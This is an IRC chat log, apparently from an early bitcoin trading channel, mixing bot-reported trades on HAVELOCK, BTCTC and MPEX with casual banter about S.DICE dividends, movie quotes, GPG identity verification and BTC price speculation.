Mar 21 20:36:34 [HAVELOCK] [VTX] 10 @ 0.3851 = 3.851 BTC [-] Mar 21 20:36:46 so bfl is fading into shoutbox obscurity Mar 21 20:38:27 MJR_: blue horseshoe loves Anacott Steel Mar 21 20:38:34 mod6: lol Mar 21 20:38:44 ;) Mar 21 20:38:59 I was trading quotes with coworkers yesterday Mar 21 20:40:10 The Notorious BIG said it best: "Either you're slingin' crack-rock, or you've got a wicked jump-shot." Nobody wants to work for it anymore. There's no honor in taking that after school job at Mickey Dee's, honor's in the dollar, kid. So I went the white boy way of slinging crack-rock: I became a stock broker. Mar 21 20:40:13 my fave Mar 21 20:40:33 haha Mar 21 20:40:50 boiler room is a classic Mar 21 20:42:32 oh yeah. thats a good one too. Mar 21 20:43:42 They say money can't buy happiness? Look at the fucking smile on my face. Ear to ear, baby. Mar 21 20:44:01 Ben affleks finest work was that scene I think Mar 21 20:44:18 lol yeah! Mar 21 20:44:20 Come on... not Reindeer Games? Mar 21 20:44:29 hahaha Mar 21 20:44:37 I bet he wishes he could erase that. Mar 21 20:44:41 frak Mar 21 20:44:42 he pulls off douche so easily Mar 21 20:44:59 what about gilly or whatever the fuck Mar 21 20:45:07 he probably wants to delete that one Mar 21 20:45:24 lol there were a bunch of bad ones... Mar 21 20:45:24 Jersey Girl wasn't that bad IIRC Mar 21 20:45:30 lol Mar 21 20:45:58 that scene was basically a rip off of Alex Baldwin in glengarry glen Ross Mar 21 20:46:05 ayite, back to work... good luck all Mar 21 20:46:12 c-ya Mar 21 20:46:17 later Mar 21 20:46:30 yeah, i've had 5 cups of coffee, btc is > $70 and im /still/ workin like a slave Mar 21 20:46:38 this is wrong Mar 21 20:46:46 shut up and work it. Mar 21 20:47:07 lol, I've never worked harder than when I got involved in bitcoin Mar 21 20:47:14 mod6: turns out the right move woul've been to maxout my credit cards with cash advances and buy btc a few months ago Mar 21 20:47:24 no shit Mar 21 20:47:27 hindsight Mar 21 20:47:30 yeah Mar 21 20:47:35 smickles: its hard not to see how that would have paid off. Mar 21 20:47:40 you could also have bankrupted Mar 21 20:47:44 bingo! Mar 21 20:47:49 you never know Mar 21 20:47:50 still could be Mar 21 20:47:53 yeah ^^^ Mar 21 20:47:53 Total 299084. this month mpoe bot is going over 300k contracts traded Mar 21 20:47:53 yep Mar 21 20:47:54 ;;calc (40000/2)*73 Mar 21 20:47:55 1460000 Mar 21 20:47:59 yup Mar 21 20:47:59 unless you got your capital out already Mar 21 20:48:03 mircea_popescu: nice! Mar 21 20:48:23 im married to my sdice position Mar 21 20:48:31 wow > 300k! Mar 21 20:48:36 [HAVELOCK] [VTX] 115 @ 0.3898 = 44.827 BTC [+] Mar 21 20:48:38 O.O Mar 21 20:49:17 i know right ?! Mar 21 20:49:21 *nod* Mar 21 20:49:25 thats incredible. Mar 21 20:49:34 i love it. Mar 21 20:49:44 mpex > * Mar 21 20:49:46 so whats the dividend projection? Mar 21 20:49:56 prev record was january, 190k Mar 21 20:50:08 ThickAsThieves there's never been a projection on s.mpoe divs Mar 21 20:50:18 [BTCTC] [BTC-BOND] 50 @ 0.0099 = 0.495 BTC [+] Mar 21 20:50:23 i meant informally Mar 21 20:50:32 yeah. Mar 21 20:50:35 over 9000 Mar 21 20:50:35 napkin math or such Mar 21 20:50:45 ya know, it's possible to calc it if you track what the bot is buying/selling for and the trade data Mar 21 20:51:01 revenue, anyway Mar 21 20:51:07 anywhere between -299k btc and + 299k btc fo sho Mar 21 20:51:34 is that a forward-looking statement? Mar 21 20:51:36 :) Mar 21 20:51:59 lol not rly. Mar 21 20:52:03 [HAVELOCK] [SDICE] 2 @ 0.43000001 = 0.86 BTC [-] Mar 21 20:52:06 mathematica necesitatis Mar 21 20:52:08 well, damn, ofc i lost MY less than 1 bet Mar 21 20:52:17 lol copycaty Mar 21 20:52:46 [BTCTC] [BTC-GOLD] 1 @ 0.00999 BTC [+] Mar 21 20:53:03 [HAVELOCK] [SDICE] 5 @ 0.416 = 2.08 BTC [-] Mar 21 20:53:07 whats the forwrad looking statement for bbet Mar 21 20:53:24 [HAVELOCK] [VTX] 14 @ 0.3898 = 5.4572 BTC [+] Mar 21 20:53:33 ya know, i'd be selling satoshi dice dice at satoshidicedice.com right now if evoorhees had given me anything more than an informal statement that he wouldn't sue me for using the brand Mar 21 20:53:34 > 20 in fees and > 10 btc in confiscations from wannabe scalpers that failed at it. Mar 21 20:53:51 [HAVELOCK] [VTX] 38 @ 0.3898 = 14.8124 BTC [+] Mar 21 20:54:01 [HAVELOCK] [VTX] 2 @ 0.3898 = 0.7796 BTC [+] Mar 21 20:54:15 [HAVELOCK] [VTX] 1 @ 0.3898 BTC [+] Mar 21 20:54:42 smickles what are you so worried about anyway Mar 21 20:54:46 if he gets pissy you share revenue Mar 21 20:54:57 I placed some bets, but I forgot on what. I guess I could scrape your site for the few of my btc addy. Mar 21 20:55:14 to find it... damn drunken bets. Mar 21 20:55:20 just put your addy into the searchbox deadweasel Mar 21 20:55:27 what do you mean selling sdice on satoshidice.com? Mar 21 20:55:29 lol, thx Mar 21 20:55:43 MJR_: satoshidicedice.com Mar 21 20:55:49 lol cool Mar 21 20:56:01 [HAVELOCK] [VTX] 256 @ 0.3898 = 99.7888 BTC [+] Mar 21 20:56:23 [HAVELOCK] [VTX] 76 @ 0.3898 = 29.6248 BTC [+] Mar 21 20:56:30 mircea_popescu: i'm weary about entering into a business with a guy who won't put anything in writing ever Mar 21 20:56:32 [HAVELOCK] [VTX] 100 @ 0.3898 = 38.98 BTC [+] Mar 21 20:56:44 the prospectus? Mar 21 20:57:03 MJR_: no, i mean just in the dice situation Mar 21 20:57:06 [HAVELOCK] [VTX] 2 @ 0.3898 = 0.7796 BTC [+] Mar 21 20:57:47 i was going to have dice manufacured and sell them and he said it was ok, and that if they looked good he'd advertise them. but would not have any form of that deal in writing Mar 21 20:58:00 smickles so ? Mar 21 20:58:06 [HAVELOCK] [VTX] 2 @ 0.3898 = 0.7796 BTC [+] Mar 21 20:58:09 fuck me, mp, you made my day. Mar 21 20:58:14 thank god for drunken bets Mar 21 20:58:26 lol. talk to kakobrekla Mar 21 20:58:31 tho last time i got the cake :D Mar 21 20:58:42 haha, that's gamblin' for ya Mar 21 20:58:43 so i don't want to do something that puts me in such a vulnerable position Mar 21 20:58:50 so don't bend over Mar 21 20:58:57 soap on a rope Mar 21 20:59:01 I was wondering what the process is for ssd certification? Mar 21 20:59:12 mircea_popescu: Mar 21 20:59:16 smickles i don't follow. you outlay what, 50 btc for printing dice on his promise that he'll adverise them if he likes them. Mar 21 20:59:20 S.DICE is kinda cheap lately Mar 21 20:59:26 what's the concept, that instead he sues you ? Mar 21 20:59:27 it really is Mar 21 20:59:47 MJR_ you asking me about ssd ?! why ? Mar 21 20:59:59 [HAVELOCK] [VTX] 23 @ 0.3898 = 8.9654 BTC [+] Mar 21 21:00:00 slightly smoking dragon Mar 21 21:00:03 [HAVELOCK] [SDICE] 5 @ 0.416 = 2.08 BTC [-] Mar 21 21:00:21 I think it has become the de facto standard of excellence Mar 21 21:00:29 hahaha Mar 21 21:00:37 that's hard to get, man. Mar 21 21:00:39 so what body grants this status? Mar 21 21:00:51 is it nomination? application? Mar 21 21:00:57 you gotta pass the bridge o' death Mar 21 21:01:01 lol Mar 21 21:01:03 [HAVELOCK] [KCIM] 1 @ 1.08 BTC [-] Mar 21 21:01:04 [HAVELOCK] [KCIM] 2 @ 1.07 = 2.14 BTC [-] Mar 21 21:01:06 [HAVELOCK] [KCIM] 4 @ 1.01 = 4.04 BTC [-] Mar 21 21:01:07 [HAVELOCK] [KCIM] 14 @ 1.001 = 14.014 BTC [-] Mar 21 21:01:13 [HAVELOCK] [VTX] 2 @ 0.3898 = 0.7796 BTC [+] Mar 21 21:01:17 mircea_popescu: well, he implied that he either wasn't the sole owner of sdice (outside of S.DICE) or that he would soon become only a part owner and that his word would not transfer to these other owners Mar 21 21:01:29 seriously, though...I trust a ssd more than Moody's Mar 21 21:01:53 at the least, i saw it as a bad risk to lay down money on production and then get a c&d Mar 21 21:02:02 [HAVELOCK] [VTX] 5 @ 0.3898 = 1.949 BTC [+] Mar 21 21:02:03 ;;ticker Mar 21 21:02:03 BTCUSD ticker | Best bid: 72.50001, Best ask: 72.71000, Bid-ask spread: 0.20999, Last trade: 72.19800, 24 hour volume: 97249.46875243, 24 hour low: 63.00000, 24 hour high: 74.90000, 24 hour vwap: 67.41164 Mar 21 21:02:29 smickles unless you lay down A LOT of money it seems maybe exaggerated. Mar 21 21:02:34 are you fucking kidding me? Mar 21 21:02:41 I don't think that they would care much Mar 21 21:02:53 MJR_ even if they did care, they'd split revenue somehow Mar 21 21:03:03 [HAVELOCK] [VTX] 54 @ 0.3898 = 21.0492 BTC [+] Mar 21 21:03:10 I doubt it would really matter compared to their revenue Mar 21 21:03:14 yeah... Mar 21 21:03:21 ah well, one of you do it then. i'm on to other things Mar 21 21:03:24 worst case revenue split Mar 21 21:03:40 maybe the guy with the bitcoin buttons'd be interested Mar 21 21:03:49 I understand the reticence smickles Mar 21 21:04:15 it right now is possible to lean on the community aspects of the bitcoin world Mar 21 21:04:27 Just put a withdrawal request in Mar 21 21:04:34 and maybe we shouldn't so much Mar 21 21:04:46 Namworld: love the bonds Mar 21 21:04:54 i mean, all i was asking for was a 'paper copy' of what he was saying Mar 21 21:04:59 [HAVELOCK] [VTX] 4 @ 0.3898 = 1.5592 BTC [+] Mar 21 21:05:09 pgp signed? Mar 21 21:05:12 sure Mar 21 21:05:17 aye, too bad I can't sell more. Mar 21 21:05:23 you can't? Mar 21 21:05:32 I'll be doing buybacks even Mar 21 21:05:51 I wish they had an automatic rebuy option Mar 21 21:06:06 to reinvest income back in Mar 21 21:06:07 [HAVELOCK] [VTX] 18 @ 0.3898 = 7.0164 BTC [+] Mar 21 21:06:29 [HAVELOCK] [VTX] 8 @ 0.3898 = 3.1184 BTC [+] Mar 21 21:06:45 mircea_popescu: this also happened that day that he had trouble authing with gribble, so, given that he wasn't willing to sign anything, i had a small bit of doubt that i was even talking with the real evoorhees Mar 21 21:06:46 [HAVELOCK] [VTX] 8 @ 0.3898 = 3.1184 BTC [+] Mar 21 21:07:23 oh i remember that day. Mar 21 21:07:28 we had faux ev on here Mar 21 21:07:30 smickles: well nothing ventured, nothing lost Mar 21 21:08:12 heh, i ended up using the money to make an extra payment on my wife's car Mar 21 21:08:15 You miss 100% of the shots you don't take -- Wayne Gretzky Mar 21 21:08:36 [HAVELOCK] [VTX] 10 @ 0.3898 = 3.898 BTC [+] Mar 21 21:08:40 ah Mar 21 21:08:59 i think the anme is nickserv'd tho Mar 21 21:09:16 probably Mar 21 21:09:18 [HAVELOCK] [VTX] 5 @ 0.3898 = 1.949 BTC [+] Mar 21 21:09:22 double auth Mar 21 21:09:23 as if i know how good a pw he has Mar 21 21:09:27 hehehe Mar 21 21:10:19 those guys are so busy it doesn't seem like sdice is the main thing on their mind Mar 21 21:11:03 [BTCTC] [ASICMINER-PT] 20 @ 0.85896 = 17.1792 BTC [-] Mar 21 21:11:07 see how many interviews he's doing...almost never really talks about sdice Mar 21 21:11:11 ;;bc,24hprc Mar 21 21:11:16 67.54 Mar 21 21:11:44 x-41/x=50 Mar 21 21:11:57 [BTCTC] [PAJKA.BOND] 6 @ 0.108999 = 0.654 BTC [+] Mar 21 21:11:59 oops= .50 Mar 21 21:12:07 you sunk my battleship in 1 dimention? Mar 21 21:12:39 sion -_- Mar 21 21:12:40 one dimensional battleship... Mar 21 21:12:52 [BTCTC] [SYNERGY] 1 @ 0.01001 BTC [-] Mar 21 21:12:55 sdice is his dirty little secret that pays for his bitcoin jesus work Mar 21 21:13:01 hehehe Mar 21 21:13:16 I don't see it as dirty Mar 21 21:13:28 youd ont Mar 21 21:13:32 think bitcoin gambling is more honest Mar 21 21:13:34 but gambling is not legal remember Mar 21 21:13:40 ah true Mar 21 21:13:53 ;;ticker --high Mar 21 21:13:53 74.90000 Mar 21 21:14:02 [HAVELOCK] [SDICE] 7 @ 0.4111 = 2.8777 BTC [-] Mar 21 21:14:03 I find it hilarious that I can say on average you will always lose and people say ok Mar 21 21:14:06 you cant be a gangster and a preacher at the same time Mar 21 21:14:16 ThickAsThieves: I think you can Mar 21 21:14:23 then i will! Mar 21 21:14:35 yes! go forth, be fruitful Mar 21 21:14:58 [HAVELOCK] [VTX] 2 @ 0.3898 = 0.7796 BTC [+] Mar 21 21:15:07 as soon as my business gets our slightly smoking dragon certification Mar 21 21:15:17 [HAVELOCK] [VTX] 8 @ 0.3897 = 3.1176 BTC [-] Mar 21 21:15:35 I joke about that, but seriously...mpex has street cred and trust Mar 21 21:16:03 you could rate things (you are implicitly doing that by allowing people to list here) Mar 21 21:17:19 [HAVELOCK] [VTX] 1 @ 0.3897 BTC [-] Mar 21 21:17:25 MJR_ list where ? Mar 21 21:17:36 [MPEX] [S.MPOE] 5550 @ 0.0007304 = 4.0537 BTC [-] Mar 21 21:17:42 and i do rate things, if you follow me here or the girl on the forum you get an idea Mar 21 21:18:03 [HAVELOCK] [SDICE] 1 @ 0.401 BTC [-] Mar 21 21:18:05 [HAVELOCK] [SDICE] 3 @ 0.4001 = 1.2003 BTC [-] Mar 21 21:19:53 ;;bc,prc Mar 21 21:19:54 Error: "bc,prc" is not a valid command. Mar 21 21:19:58 MJR_: mpex has your trust and cred. Mar 21 21:20:10 yes true Mar 21 21:20:19 but i don't think anyone can say anything bad about it Mar 21 21:20:22 don't mean shit, the whole game could end tomorrow. Mar 21 21:20:24 never forget Mar 21 21:20:25 yeah Mar 21 21:20:26 of course Mar 21 21:21:00 it's power struggle that has yet to be settled and MPEX could be a casualty. Mar 21 21:21:00 whats that command for prc? Mar 21 21:21:03 or the victor Mar 21 21:21:11 who knows Mar 21 21:21:18 i wouldn't phrase quite so dramatically Mar 21 21:21:23 but yeah Mar 21 21:21:27 ;;bc,24hprc Mar 21 21:21:32 67.66 Mar 21 21:21:33 thanks smickles Mar 21 21:22:24 ya well... Mar 21 21:22:54 mircea_popescu mpex has "street cred" Mar 21 21:22:59 i just read it on the internet Mar 21 21:23:37 dun be messin' up ma streets. Mar 21 21:24:25 mp fux you up Mar 21 21:24:52 [BTCTC] [COGNITIVE] 1 @ 0.18799 BTC [+] Mar 21 21:25:41 [BTCTC] [BASIC-MINING] 1 @ 0.349 BTC [+] Mar 21 21:26:00 Josh_Rossi: I am a drama queen, it's something I've been working on for a few years. I was raised by women. Mar 21 21:26:18 [HAVELOCK] [VTX] 5 @ 0.3897 = 1.9485 BTC [-] Mar 21 21:26:33 Thank you mircea Mar 21 21:27:09 yee Mar 21 21:27:24 [HAVELOCK] [VTX] 150 @ 0.3897 = 58.455 BTC [-] Mar 21 21:29:38 [HAVELOCK] [VTX] 98 @ 0.3897 = 38.1906 BTC [-] Mar 21 21:29:41 deadweasel: lol, no worries Mar 21 21:30:18 i am working on an executive summary and i am going to phrase that scenario as "regulatory force majeur" Mar 21 21:30:47 because i don't think necessarily that it matters what risks you are taking as long as you are aware you are taking them and honest about them Mar 21 21:31:07 [MPEX] [S.MPOE] 2110 @ 0.0007304 = 1.5411 BTC [-] Mar 21 21:31:09 [MPEX] [S.MPOE] 3100 @ 0.00072802 = 2.2569 BTC [-] Mar 21 21:31:14 [MPEX] [S.MPOE] 1590 @ 0.00071536 = 1.1374 BTC [-] Mar 21 21:33:05 its like crosswalks Mar 21 21:33:16 they say you are twice as likely to be hit by a car in a crosswalk vs jaywalking Mar 21 21:33:26 [HAVELOCK] [VTX] 80 @ 0.3927 = 31.416 BTC [+] Mar 21 21:34:47 looks like VTX/cavirtex is selling well Mar 21 21:34:57 you think we'll hit $100/BTC this month? Mar 21 21:36:27 possibly. Mar 21 21:36:33 [HAVELOCK] [VTX] 50 @ 0.3927 = 19.635 BTC [+] Mar 21 21:38:26 ;;ident Mar 21 21:38:26 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 21 21:44:03 [HAVELOCK] [SDICE] 6 @ 0.4001 = 2.4006 BTC [-] Mar 21 21:44:15 [HAVELOCK] [VTX] 6 @ 0.3927 = 2.3562 BTC [+] Mar 21 21:44:54 so where are my C1000N, C2000N and C5000Ns? Mar 21 21:44:56 i was thinking about the interesting possibilities for insurance and such Mar 21 21:44:59 jurov srsly. Mar 21 21:45:14 lol Mar 21 21:45:26 ;;ticker Mar 21 21:45:27 BTCUSD ticker | Best bid: 71.84382, Best ask: 72.19999, Bid-ask spread: 0.35617, Last trade: 72.19999, 24 hour volume: 102630.95374871, 24 hour low: 63.00000, 24 hour high: 74.90000, 24 hour vwap: 67.73641 Mar 21 21:45:38 i might take some C1000N Mar 21 21:46:46 i think ima hold back issuing new lines till opex Mar 21 21:46:49 (a week away by now) Mar 21 21:47:12 [HAVELOCK] [VTX] 2 @ 0.3987 = 0.7974 BTC [+] Mar 21 21:47:28 those should be fun Mar 21 21:47:46 but would i need access to euros? Mar 21 21:47:58 opex? Mar 21 21:48:03 i know they are denominated in btc Mar 21 21:48:37 but they are delivarables if i remember correctly? Mar 21 21:48:38 option expiration Mar 21 21:48:51 oh lol thought that was something different Mar 21 21:48:56 Josh_Rossi huh ? Mar 21 21:49:25 [HAVELOCK] [VTX] 25 @ 0.3987 = 9.9675 BTC [+] Mar 21 21:49:52 hi Mar 21 21:50:01 same person Mar 21 21:50:14 ;;ident Josh_Rossi Mar 21 21:50:15 Nick 'Josh_Rossi', with hostmask 'Josh_Rossi!Josh_Rossi@cpe-68-174-114-54.nyc.res.rr.com', is identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 21 21:50:23 ;;ident mjr_ Mar 21 21:50:24 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Mar 21 21:50:43 [BTCTC] [BTC-BOND] 10 @ 0.00985 = 0.0985 BTC [-] Mar 21 21:50:44 ;;IDENT Mar 21 21:50:45 [BTCTC] [BTC-BOND] 2 @ 0.009843 = 0.0197 BTC [-] Mar 21 21:50:45 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 21 21:50:46 [BTCTC] [BTC-BOND] 10 @ 0.009843 = 0.0984 BTC [-] Mar 21 21:50:48 [BTCTC] [BTC-BOND] 30 @ 0.009842 = 0.2953 BTC [-] Mar 21 21:50:58 i wish i could link both to the same one Mar 21 21:51:00 [MPEX] [S.MPOE] 4367 @ 0.00073058 = 3.1904 BTC [+] Mar 21 21:51:02 [MPEX] [S.MPOE] 7100 @ 0.00073461 = 5.2157 BTC [+] Mar 21 21:51:04 [MPEX] [S.MPOE] 7361 @ 0.00073552 = 5.4142 BTC [+] Mar 21 21:51:08 [MPEX] [S.MPOE] 8672 @ 0.00073756 = 6.3961 BTC [+] Mar 21 21:51:18 [BTCTC] [PAJKA.BOND] 1 @ 0.108999 BTC [+] Mar 21 21:51:46 I figured that I would use my real name if i have to sign things and build up WoT Mar 21 21:51:57 but for average chats i prefer this handle Mar 21 21:53:08 this is not a good idea. Mar 21 21:53:15 splitting your name, nobody will know who the fuck josh is Mar 21 21:53:19 you can use group with nickserv, i think gribble will pick it up? Mar 21 21:53:19 yeah Mar 21 21:53:24 it won't Mar 21 21:53:29 i'm josh Mar 21 21:53:36 there can be only one Mar 21 21:53:36 me too Mar 21 21:53:40 now i'm all bsnsss Mar 21 21:53:41 i'm josh Mar 21 21:53:41 hehehe Mar 21 21:53:42 too bad for you Mar 21 21:53:46 i was here first Mar 21 21:53:49 true Mar 21 21:53:55 but we aren't the only two josh's in the world Mar 21 21:53:59 3 Mar 21 21:54:00 [HAVELOCK] [VTX] 1 @ 0.3987 BTC [+] Mar 21 21:54:03 ok you can be josh too i guess Mar 21 21:54:04 yeah, i'd say stick with mjr_ or whatever. cause i thought Josh_Rossi was a newb Mar 21 21:54:07 BFL has a josh Mar 21 21:54:08 hehehe Mar 21 21:54:09 everyone in their 20s is named josh Mar 21 21:54:10 no, i resign Mar 21 21:54:11 :) Mar 21 21:54:12 it's like ridiculous by now Mar 21 21:54:14 let's make him change his name Mar 21 21:54:18 it was never my name Mar 21 21:54:26 but if i were to sign a statement Mar 21 21:54:30 do it! you must pay him btc for it Mar 21 21:54:32 be cool. call ur joshua Mar 21 21:54:35 and i needed it tied to my government identity Mar 21 21:54:36 name him MPEX the minor Mar 21 21:54:40 oh joshua gets me moist Mar 21 21:54:42 watch out Mar 21 21:54:57 watch out he pop ham Mar 21 21:55:12 lol also it is pretty easy for me to prove that i'm me Mar 21 21:55:13 obviously i'm hiding Mar 21 21:55:16 ;;ident Mar 21 21:55:17 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 21 21:55:22 [HAVELOCK] [VTX] 7 @ 0.3987 = 2.7909 BTC [+] Mar 21 21:55:47 its weird though, i was inspired to use my real name by mircea_popescu Mar 21 21:55:55 ah, time to clock out. later all, do great things while I'm gone. Mar 21 21:55:56 but it feels to weird always showing that Mar 21 21:56:23 also i got pissed off cuz some other guy who got here later than me registered mjr Mar 21 21:56:47 ;;lucky smickles Mar 21 21:56:48 http://www.urbandictionary.com/define.php?term=proper%20smickles Mar 21 21:56:52 :D Mar 21 21:57:19 lol cool nick Mar 21 21:57:26 ;;lucky mjr_ Mar 21 21:57:26 http://www.mjrtheatres.com/ Mar 21 21:57:30 hahaha Mar 21 21:57:32 ;;ud smickle Mar 21 21:57:33 http://www.urbandictionary.com/define.php?term=smickle | Smickle. a clean alternative to the word (shit). aww come on! that's bull smickle. buy smickle mugs & shirts · bullshit shit baloney false unbelievable by Esilentone ... Mar 21 21:57:38 smickles IS the best Mar 21 21:57:41 by far Mar 21 21:57:46 think is, i had the nick before the slang existed Mar 21 21:57:47 sry smickles Mar 21 21:57:50 *thing Mar 21 21:57:57 no shit Mar 21 21:57:57 i hope it is a family name Mar 21 21:58:06 send the family member that link to ud Mar 21 21:58:45 billg: did you mean "no smickles" Mar 21 21:58:49 hah, guess what the second link is on a google for smickles Mar 21 21:58:51 see the full page. there's 2. and 3. meaning, even more hilarious Mar 21 21:58:57 hehehe Mar 21 21:59:19 idk why S.DICE is so low. Seems like it's doing pretty well. Month is just a bit lower... Mar 21 21:59:25 i like the third link you SEO genius Mar 21 21:59:39 I've been buying some at 0.004 Mar 21 21:59:42 Namworld: I am thinking of doubling down on it Mar 21 21:59:53 it just depends...i really love a revenue stream in bitcoins Mar 21 22:00:03 [HAVELOCK] [KCIM] 3 @ 1.001 = 3.003 BTC [-] Mar 21 22:00:09 hence MPOE and SDICE Mar 21 22:00:13 also BTCBOND Mar 21 22:00:24 BTCBOND doesn't pay much Mar 21 22:00:31 tho Mar 21 22:00:36 yeah, but i like to be diversified Mar 21 22:00:47 you could make a smickle me elmo that pissed himself Mar 21 22:00:57 also i lend money out on bitfinex so i always have dollars too Mar 21 22:01:12 so it is a partially hedged position Mar 21 22:01:20 oh and some lucky guy made 0.69 btc today in coinbr affiliate credit.. wasn't that you? Mar 21 22:01:21 but options have treated me the best so far Mar 21 22:01:28 that would be me Mar 21 22:01:35 thank you so much Mar 21 22:01:41 it was a great birthday present Mar 21 22:01:45 ;) Mar 21 22:02:02 i need to start opening more accounts for you Mar 21 22:02:03 [HAVELOCK] [VTX] 5 @ 0.3904 = 1.952 BTC [-] Mar 21 22:02:36 is there a good link to see an estimate for divs for sdice? Mar 21 22:02:45 yes Mar 21 22:02:46 I thought my .67 was pretty good Mar 21 22:03:07 https://bitcointalk.org/index.php?topic=80312.msg1654405#msg1654405 Mar 21 22:03:13 if you noticed transactions per day went from 70k to 45k Mar 21 22:03:13 You see S.DICE analysis Mar 21 22:03:20 and that was from satoshi dice going down Mar 21 22:03:43 It was down? Mar 21 22:04:35 yeah profits are still good Mar 21 22:05:03 i have to stick to my guns, i think the markets are wrong on this one Mar 21 22:05:36 though its possible that they just found better investments, higher yield etc...its a pretty thin market really Mar 21 22:06:23 hmm Mar 21 22:07:11 ;;bc,convert eur Mar 21 22:07:12 1 BTC = 73.25000 U.S. dollars = 56.8269977 Euros Mar 21 22:07:28 the only problem is that each share will cost me more in dollars if i choose to put more in now Mar 21 22:07:44 i wish i was more fully in the btc economy Mar 21 22:08:12 [HAVELOCK] [VTX] 1 @ 0.3904 BTC [-] Mar 21 22:10:20 lol so bratislava region has 7th highest Regional GDP per capita in the EU27? dunno why Mar 21 22:10:46 more than prague/vienna/stockholm? Mar 21 22:10:55 where is bratislava? Mar 21 22:11:03 you don;t want to know Mar 21 22:11:10 hostel filmed there Mar 21 22:11:48 seems cool Mar 21 22:11:54 hostel was actually filmed in czech republic Mar 21 22:11:57 don't know enough about sloavakia Mar 21 22:11:59 it was set in bratislava Mar 21 22:12:01 slovakia Mar 21 22:13:47 ;;calc 69188.35120444 * 70 Mar 21 22:13:48 4843184.58431 Mar 21 22:13:59 4 million? Mar 21 22:14:37 [HAVELOCK] [VTX] 100 @ 0.3904 = 39.04 BTC [-] Mar 21 22:16:05 [BTCTC] [PAJKA.BOND] 3 @ 0.109 = 0.327 BTC [+] Mar 21 22:19:33 [HAVELOCK] [VTX] 103 @ 0.3862 = 39.7786 BTC [-] Mar 21 22:19:56 [HAVELOCK] [VTX] 33 @ 0.3862 = 12.7446 BTC [-] Mar 21 22:21:23 anyone want to trade some mpexbtc for some mtgoxbtc? Mar 21 22:21:52 ;;sell 5 mpexbtc @ 5 mtgoxbtc Mar 21 22:21:53 Order id 14165 created. Mar 21 22:21:59 [HAVELOCK] [VTX] 10 @ 0.3862 = 3.862 BTC [-] Mar 21 22:22:05 [HAVELOCK] [VTX] 50 @ 0.3862 = 19.31 BTC [-] Mar 21 22:22:18 [HAVELOCK] [VTX] 6 @ 0.3862 = 2.3172 BTC [-] Mar 21 22:23:34 [MPEX] [O.BTCUSD.P750N] 16 @ 0.24771283 = 3.9634 BTC [-] Mar 21 22:24:31 ;;calc 16/1.2477 Mar 21 22:24:31 12.8235954156 Mar 21 22:24:42 ;;calc 75/1.2477 Mar 21 22:24:43 60.1106035105 Mar 21 22:25:30 [HAVELOCK] [VTX] 51 @ 0.3862 = 19.6962 BTC [-] Mar 21 22:27:33 [HAVELOCK] [VTX] 3 @ 0.3862 = 1.1586 BTC [-] Mar 21 22:27:51 [HAVELOCK] [VTX] 30 @ 0.3862 = 11.586 BTC [-] Mar 21 22:28:52 jurov: id trust those GDP per capita numbers with a grain of salt Mar 21 22:29:43 yea. dunno why they publish them then (and moreover, 2 years late) Mar 21 22:30:22 mississipi has a gdp per capita of germany or some shit Mar 21 22:30:31 but if you visit the 2 its like night and day lol Mar 21 22:33:28 same with bratislava and vienna Mar 21 22:33:58 [HAVELOCK] [VTX] 307 @ 0.3862 = 118.5634 BTC [-] Mar 21 22:34:01 [HAVELOCK] [VTX] 2 @ 0.3862 = 0.7724 BTC [-] Mar 21 22:34:39 [BTCTC] [BITVPS] 1 @ 0.004 BTC [+] Mar 21 22:35:33 [HAVELOCK] [VTX] 487 @ 0.3862 = 188.0794 BTC [-] Mar 21 22:38:13 [HAVELOCK] [VTX] 116 @ 0.3862 = 44.7992 BTC [-] Mar 21 22:40:13 [HAVELOCK] [VTX] 31 @ 0.3862 = 11.9722 BTC [-] Mar 21 22:40:48 [MPEX] [S.DICE] 1 @ 0.00499997 BTC [+] Mar 21 22:41:33 [BTCTC] [ASICMINER-PT] 12 @ 0.8589 = 10.3068 BTC [-] Mar 21 22:41:36 [MPEX] [S.MPOE] 856 @ 0.00071536 = 0.6123 BTC [-] Mar 21 22:41:58 [BTCTC] [ASICMINER-PT] 1 @ 0.8589 BTC [-] Mar 21 22:42:03 ;;rate jborkl 1 sent first :) Mar 21 22:42:03 Error: User doesn't exist in the Rating or GPG databases. User must be GPG-registered to receive ratings. Mar 21 22:42:09 [BTCTC] [BITVPS] 2 @ 0.004 = 0.008 BTC [+] Mar 21 22:42:12 ;;rate jborkl_ 1 sent first :) Mar 21 22:42:15 Rating entry successful. Your rating of 1 for user jborkl_ has been recorded. Mar 21 22:45:50 smickles in the mpexgui, a MTGOX last really small at the top would be cool Mar 21 22:46:34 jborkl: I'll add that to the list, probably next thing i do since it'd be very easy Mar 21 22:46:54 [HAVELOCK] [VTX] 1 @ 0.3862 BTC [-] Mar 21 22:47:38 ok, cool thanks Mar 21 22:47:45 I paid for the MPEx GUI Mar 21 22:48:00 I hope we get a windows exe soon Mar 21 22:48:09 [HAVELOCK] [VTX] 36 @ 0.3862 = 13.9032 BTC [-] Mar 21 22:49:39 Namworld: It's part of the plan, should come after I code in the full mpex command list Mar 21 22:50:40 Namworld: also, thanks :) Mar 21 22:54:03 [HAVELOCK] [VTX] 2 @ 0.3862 = 0.7724 BTC [-] Mar 21 22:55:23 [HAVELOCK] [VTX] 9 @ 0.3862 = 3.4758 BTC [-] Mar 21 22:55:36 [HAVELOCK] [VTX] 10 @ 0.3862 = 3.862 BTC [-] Mar 21 22:56:23 bitcoins starting to get bubbly Mar 21 22:56:27 [HAVELOCK] [VTX] 51 @ 0.3862 = 19.6962 BTC [-] Mar 21 22:56:33 especially with people now accepting BTC for a house Mar 21 22:57:03 [HAVELOCK] [SDICE] 1 @ 0.44999999 BTC [+] Mar 21 22:57:16 